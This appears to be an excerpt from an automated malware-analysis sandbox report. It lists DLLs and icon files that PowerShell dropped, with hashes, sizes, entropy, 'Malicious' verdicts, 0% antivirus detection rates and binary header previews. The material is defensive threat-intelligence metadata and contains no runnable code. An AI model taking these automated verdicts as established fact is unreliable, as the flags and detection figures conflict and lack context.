    SHA-256:3F57F29ABD86D4DC8F4CA6C3F190EBB57D429143D98F0636FF5117E08ED81F9B
    SHA-512:1984B2FC7F9BBDF5BA66716FC60DCFD237F38E2680F2FC61F141FF7E865C0DBDD7CDC47B3BC490B426C6CFE9F3F9E340963ABF428EA79EB794B0BE7D13001F6A
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\.~...~...~.......~.......~.......~.......~.......~.......~.......~...~...~.......~.......~....}..~.......~..Rich.~..................PE..d....K.f.........." ...&.....8......................................................\]....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):83224
    Entropy (8bit):6.336512797446254
    Encrypted:false
    SSDEEP:
    MD5:DC06F8D5508BE059EAE9E29D5BA7E9EC
    SHA1:D666C88979075D3B0C6FD3BE7C595E83E0CB4E82
    SHA-256:7DAFF6AA3851A913ED97995702A5DFB8A27CB7CF00FB496597BE777228D7564A
    SHA-512:57EB36BC1E9BE20C85C34B0A535B2349CB13405D60E752016E23603C4648939F1150E4DBEBC01EC7B43EB1A6947C182CCB8A806E7E72167AD2E9D98D1FD94AB3
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.i....}...}...}..}...}.0.|...}.0.|...}.0.|...}.0.|...}o0.|...}...}...}K..|...}o0.|...}o0.|...}o0.}...}o0.|...}Rich...}........PE..d....K.f.........." ...&.v...........-.......................................`............`.............................................P............@.......0.........../...P..........T...............................@............................................text....u.......v.................. ..`.rdata...x.......z...z..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):124696
    Entropy (8bit):6.265772425588066
    Encrypted:false
    SSDEEP:
    MD5:29464D52BA96BB11DBDCCBB7D1E067B4
    SHA1:D6A288E68F54FB3F3B38769F271BF885FD30CBF6
    SHA-256:3E96CD9E8ABBEA5C6B11EE91301D147F3E416AC6C22EB53123EAEAE51592D2FE
    SHA-512:3191980CDF4AB34E0D53BA18E609804C312348DA5B79B7242366B9E3BE7299564BC1EC08F549598041D434C9C5D27684349EFF0EAA45F8FA66A02DD02F97862B
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~..~..~...P..~.....~...>..~.....~.....~......~.....~.....~..~........~.....~...<..~......~.Rich.~.........PE..d....K.f.........." ...&............|...............................................Ze....`..........................................o..P....p..................h......../.......... ...T...............................@............................................text............................... ..`.rdata.............................@..@.data...x............|..............@....pdata..h...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):178456
    Entropy (8bit):5.9718801387586655
    Encrypted:false
    SSDEEP:
    MD5:5B9B3F978D07E5A9D701F832463FC29D
    SHA1:0FCD7342772AD0797C9CB891BF17E6A10C2B155B
    SHA-256:D568B3C99BF0FC35A1F3C5F66B4A9D3B67E23A1D3CF0A4D30499D924D805F5AA
    SHA-512:E4DB56C8E0E9BA0DB7004463BF30364A4E4AB0B545FB09F40D2DBA67B79B6B1C1DB07DF1F017501E074ABD454D1E37A4167F29E7BBB0D4F8958FA0A2E9F4E405
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&h^.G...G...G...?...G.......G.......G.......G.......G.......G.......G...G..eF...?...G.......G.......G.......G.......G..Rich.G..................PE..d....K.f.........." ...&............X,..............................................c:....`.............................................d...D...................P......../......x.......T...........................@...@............................................text...$........................... ..`.rdata...#.......$..................@..@.data...h...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):55576
    Entropy (8bit):6.40171266160814
    Encrypted:false
    SSDEEP:
    MD5:097BC768988E1CCFB8080EEB782E9F14
    SHA1:F1C192CEDE46AB1EBB371DCD44327B20572AF011
    SHA-256:1AFBDA83FF0B55AC734BA1B865D67F27217F573A95317FA15244300CA5DF1479
    SHA-512:082B5762B14EF74414623044A36629F78AB8AACCFF64E376C8A9C3EE45609C0DE2561184DAB71EDC4C31058B4504313442C6400E20292700A0A33AD8E3E51CD0
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    • Antivirus: Virustotal, Detection: 0%, Browse
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~z..~z..~z......~z...{..~z......~z...~..~z...y..~z...{..~z...{..~z..~{..~z...r..~z...z..~z......~z...x..~z.Rich.~z.........................PE..d...fK.f.........." ...&.Z...`.......^...............................................]....`.........................................P...X.......d...............t......../..............T...............................@............p...............................text...XY.......Z.................. ..`.rdata...-...p.......^..............@..@.data...............................@....pdata..t...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):286488
    Entropy (8bit):5.931006412242329
    Encrypted:false
    SSDEEP:
    MD5:5B7D59037D818C7DE124886DEA4A6582
    SHA1:42364599CD533F8E206CFCC79869068576A27C1D
    SHA-256:F222B4BBB62E814E632ED08239AFF96809B306AD94C724C0FD7AB47BF320FC1E
    SHA-512:DEADCEA1232AC752AB203454932F6787C3EE7FAB247B0F7A7E8657789C3C0192B5484EF77F84F591AB28D51A1B84EDF67D883A78F15A83C6D17D242C3E6A7D50
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aw..............x...........................................x.............................................Rich............................PE..d...kK.f.........." ...&.0...........2.......................................`......6x....`..........................................1..T...$2.......@..........$$...0.../...P..p...@...T...............................@............@..p............................text...(........0.................. ..`.rdata...7...@...8...4..............@..@.data...P............l..............@....pdata..$$.......&..................@..@.rsrc........@......................@..@.reloc..p....P......."..............@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):65816
    Entropy (8bit):6.225635148398098
    Encrypted:false
    SSDEEP:
    MD5:1F08F97422A906170A803F40FE7DA3EE
    SHA1:F80031D66F32DB04E9698201C796521145BB1241
    SHA-256:64AE141A640C2A39C11C28AAFE0A2432F26D0F56B8177F1F070B3DA3797F11D9
    SHA-512:E7E48E2B112F4B440C28D750EB4430BA6C5F456E4732767953EA1384A16BCE35B1BC58D7A15A789CDDD02F46DD989E4AA4F8D32BB7E3BC49F2E453987CC54017
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............._.._.._.._.._._.^.._._.^.._._.^.._._.^.._._.^.._...^.._.._.._._.^.._._.^.._._v_.._._.^.._Rich.._........................PE..d...pK.f.........." ...&.j...j.......m..............................................I8....`.............................................X...h...d...............0......../..........p...T...........................0...@............................................text...8h.......j.................. ..`.rdata...:.......<...n..............@..@.data...............................@....pdata..0...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Category:dropped
    Size (bytes):27416
    Entropy (8bit):6.475370635016973
    Encrypted:false
    SSDEEP:
    MD5:598C1E1574A03BBB6781F68A9E741AB9
    SHA1:5A51E31C58729CC3648B620E488CF08BA3FAD0FE
    SHA-256:3562BE23F901115E00486DC09B467E7E6AE31D7DB0A3C9AE17019F76B92F8246
    SHA-512:2C95F71BB9D6ED5A6287EFD1EFE8F921E82FD87F7DFC685E4EB6EB23B909D2228F25862E1B77EE127E210EB5397AFE506389F9B6BABEA6CF4A11021B5E2D0404
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bK..&*p.&*p.&*p./R..$*p. .q.$*p. .u.-*p. .t..*p. .s.%*p.I.q.$*p.mRq.%*p.&*q..*p.I.x.'*p.I.p.'*p.I...'*p.I.r.'*p.Rich&*p.........PE..d...oK.f.........." ...&.....,......,...............................................%.....`..........................................;..X....;..d....p.......`..4....<.../......X....5..T............................3..@............0..p............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata..4....`.......,..............@..@.rsrc........p.......0..............@..@.reloc..X............:..............@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):25368
    Entropy (8bit):6.574599443384358
    Encrypted:false
    SSDEEP:
    MD5:C3ECAF0172508E20330D9754A046AB90
    SHA1:383D7AE27F97D34F333B1D8053AEC3C30C7418E5
    SHA-256:D6C24D7D5C1D0885DE58116A5578D4AF6114CD821D1189EF82078A56315E5C8F
    SHA-512:E20275E59FB1C4E3B2DB8F8B80CAE9F2D41D2BC807580D10AF5B442D46105345A6C0F0F05A6C490F447E58937055698ED251FE752885AA02F0E17016BE135BA4
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.N..N..N..6..N....N....N....N....N.....N...6..N..N..N.....N.....N......N.....N..Rich.N..........PE..d...mK.f.........." ...&.....&...............................................p............`.........................................@).......)..d....P.......@.......4.../...`..@....#..T...........................P"..@............ ...............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):49944
    Entropy (8bit):6.2948997449735815
    Encrypted:false
    SSDEEP:
    MD5:061E1A66E8126B876D74382647050E98
    SHA1:5C87523567F9457D4FBFADEB7E9EAE88976BA589
    SHA-256:A9BDCA1F485B71F1B73EE92A370B9E21D9D01A2ED4D22C5A7A9D2BD43D8843F0
    SHA-512:77FA41723F485B01D9CDD9BFA0942A3171697D396B5B271503F218E1D694D4CD711E5A2DCB056FD62CCD1FE146495CF97703C92D4D9A2177EEF4AD4EAAC713F9
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~z..~z..~z......~z...{..~z......~z...~..~z...y..~z...{..~z...{..~z..~{.;~z...r..~z...z..~z......~z...x..~z.Rich.~z.........................PE..d...lK.f.........." ...&.D...R......lG...............................................s....`.........................................P...d.......d......................../.......... y..T............................w..@............`...............................text....B.......D.................. ..`.rdata...2...`...4...H..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Category:dropped
    Size (bytes):38680
    Entropy (8bit):6.199368645201516
    Encrypted:false
    SSDEEP:
    MD5:0003A36A8A351D5657EF50C246050E2E
    SHA1:C9AD244BCACC2543A6AF4AE2D42C317E94BE01FD
    SHA-256:E4FEAB86E5372F5229E2D63E6BF4F8680A8CFE2838FEDADB12532771D22F76EC
    SHA-512:6A67A2D6413EFB0F2AD2EF3848CEF89AE135692385828029DC60FD04982AE7380C1AC64FE3CA7F2E5B954F1A2ED021AC2240C853B2E69B327ADBC210A4E097D8
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.H.Np..Np..Np..6...Np...q..Np...u..Np...t..Np...s..Np...q..Np..6q..Np..Nq..Np...x..Np...p..Np.....Np...r..Np.Rich.Np.................PE..d...nK.f.........." ...&.....P......<.....................................................`.........................................PI.......N..d....................h.../......P....B..T...........................@A..@............0..P............................text............................... ..`.rdata...'...0...(..................@..@.data........`.......F..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..P............f..............@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Category:dropped
    Size (bytes):29976
    Entropy (8bit):6.455265929163021
    Encrypted:false
    SSDEEP:
    MD5:03AD88C5004E88DF8FDDAD701CDC8FBE
    SHA1:FF6BAB467D4C049A07FD16D133DE3F5B3F1FEC62
    SHA-256:0F57A746F74C0DF12D30239481C210D28AEB1E85ADE96CEC6B797501157E0998
    SHA-512:38C2E15D24ACA5D0078FD63A6F920963287BF1FEF41B7EB7CC3A8DC7236340B62ACE0FC990E30A8D8CD4970E6177D222353ADD164EB9F187A24615055D84D2AC
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~x..~x..~x......~x...y..~x...}..~x...|..~x...{..~x...y..~x...y..~x..~y..~x...p..~x...x..~x......~x...z..~x.Rich.~x.................PE..d...nK.f.........." ...&.....2............................................................`..........................................=.......>..d....p.......`..@....F.../..........07..T............................5..@............0..h............................text............................... ..`.rdata..p....0......................@..@.data...8....P.......0..............@....pdata..@....`.......6..............@..@.rsrc........p.......:..............@..@.reloc...............D..............@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):64280
    Entropy (8bit):6.281608660509971
    Encrypted:false
    SSDEEP:
    MD5:1DF0201667B4718637318DBCDC74A574
    SHA1:FD44A9B3C525BEFFBCA62C6ABE4BA581B9233DB2
    SHA-256:70439EE9A05583D1C4575DCE3343B2A1884700D9E0264C3ADA9701829483A076
    SHA-512:530431E880F2BC193FAE53B6C051BC5F62BE08D8CA9294F47F18BB3390DCC0914E8E53D953EEE2FCF8E1EFBE17D98EB60B3583BCCC7E3DA5E21CA4DC45ADFAF4
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............og..og..og......og...f..og...b..og...c..og...d..og...f..og...f..og.G.f..og..of..og...j..og...g..og....og...e..og.Rich.og.................PE..d....K.f.........." ...&.h...f......................................................<_....`.............................................P................................/......$.......T...............................@...............p............................text....f.......h.................. ..`.rdata...@.......B...l..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):25368
    Entropy (8bit):6.6236814553037
    Encrypted:false
    SSDEEP:
    MD5:353E11301EA38261E6B1CB261A81E0FE
    SHA1:607C5EBE67E29EABC61978FB52E4EC23B9A3348E
    SHA-256:D132F754471BD8A6F6D7816453C2E542F250A4D8089B657392FE61A500AE7899
    SHA-512:FA990B3E9619D59AE3AD0AEFFCA7A3513AB143BFD0AC9277E711519010F7C453258A4B041BE86A275F3C365E980FC857C23563F3B393D1E3A223973A673E88C5
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..p2..#2..#2..#;..#0..#4 ."0..#4 .">..#4 .":..#4 ."1..#] ."0..#y."7..#2..#...#] ."3..#] ."3..#] d#3..#] ."3..#Rich2..#................PE..d....K.f.........." ...&.....&...............................................p............`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...H........................... ..`.rdata....... ......................@..@.data...X....0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):36632
    Entropy (8bit):6.3757770375418374
    Encrypted:false
    SSDEEP:
    MD5:7EC3FC12C75268972078B1C50C133E9B
    SHA1:73F9CF237FE773178A997AD8EC6CD3AC0757C71E
    SHA-256:1A105311A5ED88A31472B141B4B6DAA388A1CD359FE705D9A7A4ABA793C5749F
    SHA-512:441F18E8CE07498BC65575E1AE86C1636E1CEB126AF937E2547710131376BE7B4CB0792403409A81B5C6D897B239F26EC9F36388069E324249778A052746795E
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]lr.<.!.<.!.<.!.D.!.<.!... .<.!... .<.!... .<.!.. .<.!... .<.!.D. .<.!.<.!.<.!.D. .<.!.. .<.!.. .<.!..!.<.!.. .<.!Rich.<.!........................PE..d....K.f.........." ...&.(...:.......&.............................................._.....`..........................................U..H....V...............p..`....`.../......t...TG..T............................C..@............@.......S..@....................text....&.......(.................. ..`.rdata.......@... ...,..............@..@.data........`.......L..............@....pdata..`....p.......P..............@..@.rsrc................T..............@..@.reloc..t............^..............@..B........................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):47896
    Entropy (8bit):6.521879412925506
    Encrypted:false
    SSDEEP:
    MD5:60432D8A7EB836CC7919789CDF77EC98
    SHA1:B8465817E28F53CB1706F49D86A86D91376CAD10
    SHA-256:EDB5FEC1B18C7B657DB1A20666896B51FC2D779AE315427ED920BA493038D327
    SHA-512:7D3901B9878C93B881DC925FBCD88CE7308356C38E657F3B47E10E046B4473D16C03DBA8B7EF7F93C2B9C12C044609A073B4BDFA93257972E10A1DE216DC305F
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.4...Z...Z...Z.......Z..n[...Z..n_...Z..n^...Z..nY...Z.qn[...Z.U.[...Z...[.~.Z.qnR...Z.qnZ...Z.qn....Z.qnX...Z.Rich..Z.........PE..d...yK.f.........." ...&.J...F.......N....................................................`..........................................z..T...dz..x...............d......../...........n..T...........................Pm..@............`...............................text....H.......J.................. ..`.rdata...%...`...&...N..............@..@.data... ............t..............@....pdata..d............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):5191960
    Entropy (8bit):5.962142634441191
    Encrypted:false
    SSDEEP:
    MD5:E547CF6D296A88F5B1C352C116DF7C0C
    SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
    SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
    SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):39696
    Entropy (8bit):6.641880464695502
    Encrypted:false
    SSDEEP:
    MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
    SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
    SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
    SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):787224
    Entropy (8bit):5.609561366841894
    Encrypted:false
    SSDEEP:
    MD5:19A2ABA25456181D5FB572D88AC0E73E
    SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
    SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
    SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
    Category:dropped
    Size (bytes):75809
    Entropy (8bit):5.969322217946821
    Encrypted:false
    SSDEEP:
    MD5:B35F68A3086562C4D5453FAAD5A3474E
    SHA1:673904FF9B305A6600E47AD715289122EC0B046A
    SHA-256:150C470F9943B806B44312EFDEC85755F22F8D7D52B31F93A9AF3C43E8627381
    SHA-512:6EC80921942B3BD3C85EF24A2DE5454A34A3AD11A1BC69B601AEA7B873E318073C0B2D78C26685999F78EC64A86282C08C53AB8D77E41C661AE968EA52C08176
    Malicious:false
    Reputation:unknown
    Preview:...............7......@@......(....8..00...........N.. ..........m]...............f..........h....l........ .t/..Er..@@.... .(B......00.... ..%...... .... ............... .....1......... .h....#...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..{.$.}....w........X..V.....F..]..T..P.H().........P)..<....Y..%%...[B2....2."..\......tOwO..9=.>}^=.5s.....==gz......;..;.T.x..0.3.x.....,.l..f.a..0......`..0.....a&.6..3...`......L0l..f.a..0......`..0.....a&.6..3........_.ro...Y:>.T...V...0c.......3v..X8..0c...56.....f,.t:..,.l....#......k8...l....G..1.u.6..n....5.......w.{...N..ND.\'P.......j...1.!.u+n..v|.._... ..>.....p.....}.v.y.h6...N...%`....[.l....F`.a.....og#....`..6.....f.`#.p..`..6.....fla#0...0c....q.m.9..{......3.\v.e....>}......."...p..w8E.l....`V..........H..l....e.]..~..Nm'....`V$.v..G?.Q...l...0+.6.v..0+.6.f..0+.6.z..0...].........q...O..`..L..w.v6......#....(...a..L.l....`&.6.)+~Y.........aY.{.r?..{.n.....{..F...o\QK.s..L47.p
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
    Category:dropped
    Size (bytes):78396
    Entropy (8bit):6.10453452748711
    Encrypted:false
    SSDEEP:
    MD5:B1C9980131A3F20E344AA3AA2C8DEA49
    SHA1:0FE02F0ED5E56BBE7E4E98B1DCA061ED17FBF5C7
    SHA-256:FDA28A734788A3F175CB6AED4DAEB5F05F0E49F6A272CCD2051BA337F7B3B42F
    SHA-512:84CA107ACE44FA1964C6C1EA93FC767BDE88363339FC426A3D660DA53C84BADE14F1FAE99C494483BF2B5312938D84B0C1733C85E82592B8FFE8A28F76186A3A
    Malicious:false
    Reputation:unknown
    Preview:..............r?......@@......(...8@..00..........`V.. ...........e...............m..........h...xt........ ..1...y..@@.... .(B.....00.... ..%...... .... ............... .....L$........ .h....-...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y..W}..-.^....n.v.lK..@.../.,....`...s0g.@.0.d...8.@B&..9.'.@L....NX-..-.8v[.. ./-....zU..[..[.....w?...zU...[.-......=..#.h4..1./..h....4..F+......@..`...h:...4..F+......@..`...h:...4..F+......@..`...h:...4..F+.....O......x.9..:...t..lB{...B+..E+.M.....j%0Ah..i;,........m.....@.hO`.h..i{.'0v...=.ei%0F.. .C..M.+..<....w..d..~g&.j.*.y.uQ.T`Y..:....w.:.......y.t.BH.w.}.....v..#X.x1.....$0..F....8..<J.R.z8..Z.h....&...4m..'P.V3]..@6...........J ...4m.V...V...D+..A+.M.r.....j% F+.M[s.....Z...}.{Z.....=L.dI..9sF{....4......V.2.'....f.=....@3.h...t%...f.q...L^....Z.hf%.......3g:V.h....h%..V..Y.V.j....z.......#.J@.V...A+.$Z.h:...A,\.0.......t.........@3&fz..4.p..c....w.......\c.].g.....o...n....m.6.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
    Category:dropped
    Size (bytes):83351
    Entropy (8bit):6.269678824341842
    Encrypted:false
    SSDEEP:
    MD5:1A8230030D821CF8EA57CE03AAEAD737
    SHA1:12656788B1FBE4D2375ECC2989A4D9DA69CAA0D6
    SHA-256:C4EC1845A5724B2A83500F3BD940355E2FE26EFC6B4FE6C208365359A6130DA1
    SHA-512:AF6356DC67249E724AE30F65DDEFB4E53C6F2703DA32FD5F135598BBD6189BEE70950242F52985478DE99979D1271EEC9F4E2981A29A9BC02C673E9B668FD0C1
    Malicious:false
    Reputation:unknown
    Preview:...............H......@@......(....I..00..........._.. ..........hn...............w..........h....}........ ..;..@...@@.... .(B../...00.... ..%..W... .... ......&........ ......7........ .h.../A...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y...u.....u..l3..+Ar...)B..-.c...Y....X.$[....r..c.;>I..>..(...X.m%..G... ..H.....F,..f....~.T..W.^U...Yz.}.S....5.|....S^z.%H$...7 .H..i.$.e.4...2F...d.#..D....@"Y.H. .,c...H.1..H$..i.$.e.4...2F...d.#..D....@"Y.H. .,c...........B.d~H....G>.,.},%d. i......H. i9../.R..&!....0.C..&!...%.F.9H. iY...=..HZ.i.f.4...G...i.:.8....-..9.m..y>.G.\...x...~......O."......0".#F@..$c...B>.l&M=...........qm?>.K..?...azz:.Zi..#...E...../..t:.{...$C..IK0.n...._FGGG....#...e.\7......@...@.Rl...../J#.$.....[6..'_.9.f ...%..@s..@..H`.H. ii.l.......5.._..W.....@.......D....F.B...@....@.d.F 9..H.....$.....@...u3>.S...vzz..........@.$yx..~.g...w..Y.F@...E..x...,i...F...G..p...,...=.....f......@.lx..'..~H...b....,+.~.I|.#?.t
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):201496
    Entropy (8bit):6.366374012034735
    Encrypted:false
    SSDEEP:
    MD5:5E911CA0010D5C9DCE50C58B703E0D80
    SHA1:89BE290BEBAB337417C41BAB06F43EFFB4799671
    SHA-256:4779E19EE0F4F0BE953805EFA1174E127F6E91AD023BD33AC7127FEF35E9087B
